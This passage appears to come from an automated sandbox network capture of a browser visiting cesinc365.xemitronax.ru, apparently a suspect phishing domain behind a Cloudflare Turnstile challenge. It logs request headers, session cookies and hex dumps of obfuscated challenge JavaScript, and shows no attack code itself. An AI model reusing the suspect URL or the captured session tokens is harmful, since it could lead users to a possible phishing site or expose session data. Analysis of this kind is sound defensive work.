                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:17 UTC331INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:17 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 115959
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714d2ebc7428e-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:17 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73
                                                          Data Ascii: delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","testing_only":"Testing%20only.","turnstile_s
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 2c 67 6c 2c 67 70 2c 67 77 2c 67 41 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 65 50 2c 65 51 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 38 37 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 39 30 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 30 39 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 36 35 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 39 30 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 34 34 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 38 36 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 36 35
                                                          Data Ascii: ,gl,gp,gw,gA,gB,gC,gG,gH,eP,eQ){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(487))/1+parseInt(gI(1490))/2+parseInt(gI(1109))/3+parseInt(gI(1565))/4+parseInt(gI(790))/5+-parseInt(gI(644))/6+parseInt(gI(686))/7*(-parseInt(gI(1665
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 65 52 47 4b 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 71 51 6c 61 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 6f 68 58 74 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 56 52 6c 4c 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 45 75 6d 78 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 41 6e 69 66 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 67 4b 28 34 38 35 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 3d 3d 6e 75
                                                          Data Ascii: eRGKB':function(h,i){return h>i},'qQlaF':function(h,i){return h!=i},'ohXtN':function(h,i){return i&h},'VRlLV':function(h,i){return h-i},'Eumxa':function(h,i){return i*h},'Anife':function(h,i){return h==i}},e=String[gK(485)],f={'h':function(h){return h==nu
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 67 4d 28 37 34 33 29 5d 28 30 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 4d 26 31 7c 48 3c 3c 31 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 67 4d 28 31 31 38 33 29 5d 28 64 5b 67 4d 28 38 35 37 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 67 4d 28 31 33 32 39 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 69 5b 67 4d 28 36 32 34 29 5d 5b 67 4d 28 38 35 30 29 5d 28 29 2c 6a 5b 67 4d 28 36 32 34 29 5d 5b 67 4d 28 31 36 35 32 29 5d 28 29 2c 4a 5b 67 4d 28 36 32 34 29 5d 5b 67 4d 28 36 33 36 29 5d 28 29 2c 6f 5b 67 4d 28 36 32 34 29 5d 5b 67 4d 28 31 38 30 37
                                                          Data Ascii: I++,M=0,s++);for(M=C[gM(743)](0),s=0;16>s;H=M&1|H<<1,j-1==I?(I=0,G[gM(1183)](d[gM(857)](o,H)),H=0):I++,M>>=1,s++);}D--,0==D&&(D=Math[gM(1329)](2,F),F++),delete B[C]}else i[gM(624)][gM(850)](),j[gM(624)][gM(1652)](),J[gM(624)][gM(636)](),o[gM(624)][gM(1807
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 3d 3d 64 5b 67 4d 28 31 33 38 35 29 5d 28 6a 2c 31 29 29 7b 47 5b 67 4d 28 31 31 38 33 29 5d 28 6f 28 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20 47 5b 67 4d 28 34 39 31 29 5d 28 27 27 29 7d 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 67 4e 29 7b 72 65 74 75 72 6e 20 67 4e 3d 67 4b 2c 64 5b 67 4e 28 31 34 34 38 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 68 3d 3d 27 27 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 67 4e 28 31 38 30 31 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 4f 29 7b 72 65 74 75 72 6e 20 67 4f 3d 67 4e 2c 68 5b 67 4f 28 37 34 33 29 5d 28 69 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 50 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b
                                                          Data Ascii: ==d[gM(1385)](j,1)){G[gM(1183)](o(H));break}else I++;return G[gM(491)]('')}},'j':function(h,gN){return gN=gK,d[gN(1448)](null,h)?'':h==''?null:f.i(h[gN(1801)],32768,function(i,gO){return gO=gN,h[gO(743)](i)})},'i':function(i,j,o,gP,s,x,B,C,D,E,F,G,H,I,J,K
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 67 50 28 37 33 39 29 5d 28 30 3c 4e 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 64 5b 67 50 28 39 37 33 29 5d 28 65 2c 4a 29 2c 4f 3d 64 5b 67 50 28 31 35 30 30 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 67 50 28 34 39 31 29 5d 28 27 27 29 7d 69 66 28 78 3d 3d 30 26 26 28 78 3d 4d 61 74 68 5b 67 50 28 31 33 32 39 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4f 5d 29 4f 3d 73 5b 4f 5d 3b 65 6c 73 65 20 69 66 28 42 3d 3d 3d 4f 29 4f 3d 45 2b 45 5b 67 50 28 36 35 37 29 5d 28 30 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 67 50 28 31 31 38 33 29 5d 28 4f 29 2c 73 5b 42 2b 2b 5d 3d 45 2b 4f 5b 67 50
                                                          Data Ascii: &(H=j,G=o(I++)),J|=d[gP(739)](0<N?1:0,F),F<<=1);s[B++]=d[gP(973)](e,J),O=d[gP(1500)](B,1),x--;break;case 2:return D[gP(491)]('')}if(x==0&&(x=Math[gP(1329)](2,C),C++),s[O])O=s[O];else if(B===O)O=E+E[gP(657)](0);else return null;D[gP(1183)](O),s[B++]=E+O[gP
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 5d 3d 68 44 28 36 36 32 29 2c 6a 5b 68 44 28 36 35 32 29 5d 3d 68 44 28 31 30 35 38 29 2c 6a 29 3b 74 72 79 7b 28 6c 3d 66 6c 28 67 5b 68 44 28 39 38 36 29 5d 2c 67 5b 68 44 28 31 33 30 31 29 5d 29 2c 6b 5b 68 44 28 36 35 33 29 5d 28 67 5b 68 44 28 39 38 36 29 5d 2c 45 72 72 6f 72 29 29 3f 67 5b 68 44 28 39 38 36 29 5d 3d 4a 53 4f 4e 5b 68 44 28 31 37 30 34 29 5d 28 67 5b 68 44 28 39 38 36 29 5d 2c 4f 62 6a 65 63 74 5b 68 44 28 31 34 31 30 29 5d 28 67 5b 68 44 28 39 38 36 29 5d 29 29 3a 68 44 28 31 35 31 35 29 21 3d 3d 68 44 28 31 35 31 35 29 3f 28 48 3d 7b 7d 2c 48 5b 68 44 28 31 36 37 34 29 5d 3d 6b 5b 68 44 28 36 32 33 29 5d 2c 48 5b 68 44 28 31 32 36 37 29 5d 3d 69 5b 68 44 28 37 31 35 29 5d 5b 68 44 28 31 35 39 36 29 5d 2c 48 5b 68 44 28 31 33 38 31
                                                          Data Ascii: ]=hD(662),j[hD(652)]=hD(1058),j);try{(l=fl(g[hD(986)],g[hD(1301)]),k[hD(653)](g[hD(986)],Error))?g[hD(986)]=JSON[hD(1704)](g[hD(986)],Object[hD(1410)](g[hD(986)])):hD(1515)!==hD(1515)?(H={},H[hD(1674)]=k[hD(623)],H[hD(1267)]=i[hD(715)][hD(1596)],H[hD(1381
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 66 20 45 72 72 6f 72 29 3f 28 66 3d 64 5b 68 45 28 38 39 36 29 5d 2c 64 5b 68 45 28 38 36 38 29 5d 26 26 74 79 70 65 6f 66 20 64 5b 68 45 28 38 36 38 29 5d 3d 3d 3d 68 45 28 31 31 33 39 29 29 26 26 28 28 6a 3d 64 5b 68 45 28 38 36 38 29 5d 5b 68 45 28 31 33 31 39 29 5d 28 27 5c 6e 27 29 2c 6a 5b 68 45 28 31 38 30 31 29 5d 3e 31 29 26 26 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 68 45 28 38 30 35 29 5d 28 6b 29 2c 6c 29 29 26 26 28 65 5b 68 45 28 31 36 30 38 29 5d 28 65 5b 68 45 28 31 36 34 36 29 5d 2c 68 45 28 31 33 31 33 29 29 3f 69 5b 68 45 28 31 38 39 35 29 5d 28 6a 5b 68 45 28 37 31 35 29 5d 5b 68 45 28 38 34 32 29 5d 29 3d 3d 3d 2d 31 26 26 6f 5b 68 45 28 37 32 30 29 5d 26 26 28
                                                          Data Ascii: f Error)?(f=d[hE(896)],d[hE(868)]&&typeof d[hE(868)]===hE(1139))&&((j=d[hE(868)][hE(1319)]('\n'),j[hE(1801)]>1)&&(k=/^\s*at\s+(.+):(\d+):(\d+)/,l=j[1][hE(805)](k),l))&&(e[hE(1608)](e[hE(1646)],hE(1313))?i[hE(1895)](j[hE(715)][hE(842)])===-1&&o[hE(720)]&&(
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 4a 29 7b 68 4a 3d 68 47 2c 65 4d 5b 68 4a 28 31 35 33 38 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 68 47 28 38 30 36 29 5d 5b 68 47 28 31 38 35 37 29 5d 28 68 47 28 31 31 31 39 29 2c 65 29 29 3a 65 5b 68 47 28 31 34 39 35 29 5d 3d 66 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 66 6e 3d 30 2c 66 71 3d 7b 7d 2c 66 71 5b 67 4a 28 31 30 35 32 29 5d 3d 66 70 2c 65 4d 5b 67 4a 28 38 32 30 29 5d 3d 66 71 2c 66 73 3d 65 4d 5b 67 4a 28 37 31 35 29 5d 5b 67 4a 28 38 36 34 29 5d 5b 67 4a 28 38 38 33 29 5d 2c 66 74 3d 65 4d 5b 67 4a 28 37 31 35 29 5d 5b 67 4a 28 38 36 34 29 5d 5b 67 4a 28 31 32 32 34 29 5d 2c 66 75 3d 65 4d 5b 67 4a 28 37 31 35 29 5d 5b 67 4a 28 38 36 34 29 5d 5b 67 4a 28 31 31 35 34 29 5d 2c 66 47 3d 21 5b 5d 2c 66 53 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d
                                                          Data Ascii: J){hJ=hG,eM[hJ(1538)]()},1e3),eM[hG(806)][hG(1857)](hG(1119),e)):e[hG(1495)]=f;return![]},fn=0,fq={},fq[gJ(1052)]=fp,eM[gJ(820)]=fq,fs=eM[gJ(715)][gJ(864)][gJ(883)],ft=eM[gJ(715)][gJ(864)][gJ(1224)],fu=eM[gJ(715)][gJ(864)][gJ(1154)],fG=![],fS=undefined,eM


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.449759188.114.96.34436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:17 UTC1331OUTGET /favicon.ico HTTP/1.1
                                                          Host: cesinc365.xemitronax.ru
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://cesinc365.xemitronax.ru/9FAvn/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6IlExeTdtZkpYM0QwQitySVJNVDEvcXc9PSIsInZhbHVlIjoiR3U1UHBJS00zOVNycThlM2hIUzJUZ05HUCtJUWUraGdwRzFNYTU4c3M3Uk1mWnRJbVNDT044Vnp1MHVtcHp4VDR2VG1qU21meVliYXh5ZkFQckZkZ2U5ZmlmVFp0ZE9scVJ1VHRibnYxSHZ2QWRGajBmTC9LK3lNQ0E3SFlvdEwiLCJtYWMiOiJjZDZjMWY1MjA1MjZjNzg4ZmIyZTk3MDg0YzkyZTY3NjVlOTBiNDBmMTYzZGIzNzQ1N2VlMGI5NGRiMTE1ZjNkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpmOEZrY3BJSVZTZ0xjUTZsSExaS2c9PSIsInZhbHVlIjoiTDFKN2V0K1ovNCs3NlN1SHFQN3VwakEyRkdSejdUdjhwSGFGR2c4c3ZDU0wzMlVRaGtPMS9IWS9VamNRR2Q0VzJuaUptNURoM1Z0OVB1QUFEc1grQUNJdEw5MWY0OVFPWU9OUlpQdXU4UTF1TTdyRDlmdWRlekJBWldtZ01BL3ciLCJtYWMiOiJlYTBlYTExYTMzMzM5MzUxNTU4ZjNlYWYyYTAzZDU4YmZlZGZiMTAyZDczMzQ3NmRhYzUzMzkzNTQ5MWQwYWNhIiwidGFnIjoiIn0%3D
                                                          2025-01-09 20:12:17 UTC1067INHTTP/1.1 404 Not Found
                                                          Date: Thu, 09 Jan 2025 20:12:17 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: max-age=14400
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VsW10caaSEv3BXHBOFrlTf5Iwt5dV3lCAutlthbnB%2FGWPEtK2NTn334xBnsa9SiDQ%2F8nHl2H6nUU88IyM6YreVjQgCGAo2VhV0T%2BMdwBG0M2PNh1ebKbDtyRWny08w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Vary: Accept-Encoding
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5095&min_rtt=5058&rtt_var=1446&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2288&delivery_rate=557447&cwnd=251&unsent_bytes=0&cid=e4c94c17b0f384fd&ts=197&x=0"
                                                          CF-Cache-Status: HIT
                                                          Age: 5820
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714d2fe7f425b-EWR
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1701&rtt_var=652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1909&delivery_rate=1660034&cwnd=241&unsent_bytes=0&cid=061e7b9e37678433&ts=152&x=0"
                                                          2025-01-09 20:12:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.449760104.18.95.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:17 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2140440123:1736450218:Qkz8xK01k7_d2gYcFjCrxwUowfxFCy7ft3oS6awrjsg/8ff714c8fb27c325/sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 3166
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          CF-Chl-RetryAttempt: 0
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:17 UTC3166OUTData Raw: 76 5f 38 66 66 37 31 34 63 38 66 62 32 37 63 33 32 35 3d 34 54 35 30 46 30 67 30 6f 30 4d 30 6e 69 4e 43 69 4e 45 30 69 44 52 41 58 73 44 4e 49 69 24 24 4e 78 70 4e 52 76 30 69 59 4e 25 32 62 30 52 35 73 52 53 59 35 4e 62 68 59 4e 71 4c 69 33 34 4e 64 30 69 45 35 4e 52 51 6b 54 56 72 4e 51 41 4e 36 4e 69 54 4e 51 35 63 76 4e 70 4e 56 76 52 24 4e 41 76 68 35 54 30 30 58 64 79 56 46 4c 73 6c 6f 4f 54 53 50 31 76 52 70 66 4e 58 35 56 36 75 76 2b 41 47 4e 34 48 35 56 75 4e 68 4d 53 4e 70 7a 4f 76 48 49 30 56 4d 4f 4e 56 34 4e 68 47 43 75 69 67 57 75 36 49 38 4e 71 75 33 75 34 49 42 66 6e 69 39 4e 68 67 49 4a 64 4e 4e 35 43 44 63 65 44 4e 39 69 56 30 72 4e 52 4f 6b 4f 69 79 75 51 58 6a 2b 6d 66 71 42 4a 71 2b 48 69 35 56 56 52 43 62 43 75 76 4e 6e 2b 78 6b 59
                                                          Data Ascii: v_8ff714c8fb27c325=4T50F0g0o0M0niNCiNE0iDRAXsDNIi$$NxpNRv0iYN%2b0R5sRSY5NbhYNqLi34Nd0iE5NRQkTVrNQAN6NiTNQ5cvNpNVvR$NAvh5T00XdyVFLsloOTSP1vRpfNX5V6uv+AGN4H5VuNhMSNpzOvHI0VMONV4NhGCuigWu6I8Nqu3u4IBfni9NhgIJdNN5CDceDN9iV0rNROkOiyuQXj+mfqBJq+Hi5VVRCbCuvNn+xkY
                                                          2025-01-09 20:12:17 UTC751INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:17 GMT
                                                          Content-Type: text/plain; charset=UTF-8
                                                          Content-Length: 153084
                                                          Connection: close
                                                          cf-chl-gen: XnGpddhJwQ4KG7VkUTMxlI+q7EGRG0mvdN62qFELWzNYbgqC24maGXIeW8AaLsRWZ8kaF2rjxWTVbUUtJUyK7SGtPtEF+3IQGXNQdrCXS0fID/KDGHvPXBfvcBA7oOq+vD+sKERi6ZPwAViIb6yMHLgxP19sKLwUXCTi9zCt5TKAAWYYNNtV/X3AD2DSJg9Z0idQT/RydC+lp6dcSe3ZFbsXc8cGA/+tj2qUulVrwNYoBe6A4EM4Mbq04FqFp6dg0l0S5PeS84vlpINS2Vziqb+poXOzuXNTRLcwL7npdXjiR9p991xXDXlg7rmo0NwGSRBJ1Pxpc2VSG5tKylNdC8CaGhcShCZSIgctmsZhWtOoIWz3SPX+pS93ogMCsRtj3x/p2mtiKwU9AxCmDSnWPBvoNwuoHEx46/stTn+aL52CO7MkJ4EeXU8bxFZNVd+jSmfvEDvr289bV41eYVq+ylEhyuiUoA98fD6LOIoGQHU=$DXk5Owo8M4DmKjOWB7/qKA==
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714d3ab4e32e8-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:17 UTC618INData Raw: 6f 62 2b 68 6c 73 47 59 67 4c 37 43 77 71 6e 4e 78 73 47 6a 6d 35 43 53 6a 62 79 51 71 39 54 5a 6c 74 4b 58 74 71 58 4a 33 62 69 64 30 63 50 6c 6f 71 53 30 75 35 76 41 78 37 6d 31 33 4c 76 6d 73 4f 37 49 73 66 58 4c 77 66 4c 74 34 39 6e 74 30 37 76 55 2f 75 44 35 30 50 72 34 41 64 44 46 41 65 62 62 34 63 6e 36 2f 41 6e 4d 2f 67 30 45 7a 2b 7a 32 46 39 49 63 7a 51 59 4a 45 2f 58 33 45 68 66 35 2b 78 6e 33 38 42 6f 63 35 43 76 6e 48 43 6b 69 4b 65 6f 68 44 2b 76 76 36 43 6b 6c 46 78 51 54 46 68 4c 77 45 42 44 7a 2b 44 6f 6b 39 2f 77 32 45 68 4e 42 49 54 77 75 48 55 6b 4f 50 44 45 76 53 53 64 51 53 78 64 55 46 30 55 78 52 31 30 70 4e 54 59 74 58 6c 73 37 51 6b 68 69 51 6d 73 72 61 54 38 34 59 32 73 77 59 79 70 4f 52 6e 56 79 59 7a 6b 79 53 56 70 6e 65 47 30
                                                          Data Ascii: ob+hlsGYgL7CwqnNxsGjm5CSjbyQq9TZltKXtqXJ3bid0cPloqS0u5vAx7m13LvmsO7IsfXLwfLt49nt07vU/uD50Pr4AdDFAebb4cn6/AnM/g0Ez+z2F9IczQYJE/X3Ehf5+xn38Boc5CvnHCkiKeohD+vv6CklFxQTFhLwEBDz+Dok9/w2EhNBITwuHUkOPDEvSSdQSxdUF0UxR10pNTYtXls7QkhiQmsraT84Y2swYypORnVyYzkySVpneG0
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 39 38 59 49 70 68 68 56 4b 4d 54 47 61 4f 58 58 70 6e 6c 4a 47 55 6f 48 69 52 57 4b 69 4a 71 6e 4b 6e 61 71 57 61 72 33 42 2f 67 6f 70 79 69 62 57 44 6b 37 4e 33 74 34 74 30 76 36 32 66 77 62 4f 39 65 70 4f 55 6c 5a 32 6e 79 34 4f 71 69 71 72 4b 79 61 48 47 6e 63 53 4e 73 64 43 56 6c 61 66 47 73 4e 79 72 6d 38 32 32 74 4b 7a 55 73 4c 61 33 77 4d 72 54 77 39 2b 6a 33 74 6e 70 76 64 75 79 72 36 66 73 76 2b 33 6d 73 2f 62 49 75 62 58 73 79 72 76 43 35 4e 33 56 42 76 45 49 31 63 6e 49 34 67 48 61 31 39 6a 38 41 64 34 57 7a 50 37 71 34 67 54 37 45 2f 76 38 49 50 49 5a 37 68 66 77 2b 52 6b 47 46 67 45 43 4a 67 76 30 2b 53 63 4f 43 6a 41 45 4d 77 63 70 39 68 51 69 46 41 59 58 45 67 73 30 45 69 74 42 4c 68 6b 55 4f 6a 34 44 4a 79 55 71 41 68 38 63 4b 69 59 77 55
                                                          Data Ascii: 98YIphhVKMTGaOXXpnlJGUoHiRWKiJqnKnaqWar3B/gopyibWDk7N3t4t0v62fwbO9epOUlZ2ny4OqiqrKyaHGncSNsdCVlafGsNyrm822tKzUsLa3wMrTw9+j3tnpvduyr6fsv+3ms/bIubXsyrvC5N3VBvEI1cnI4gHa19j8Ad4WzP7q4gT7E/v8IPIZ7hfw+RkGFgECJgv0+ScOCjAEMwcp9hQiFAYXEgs0EitBLhkUOj4DJyUqAh8cKiYwU
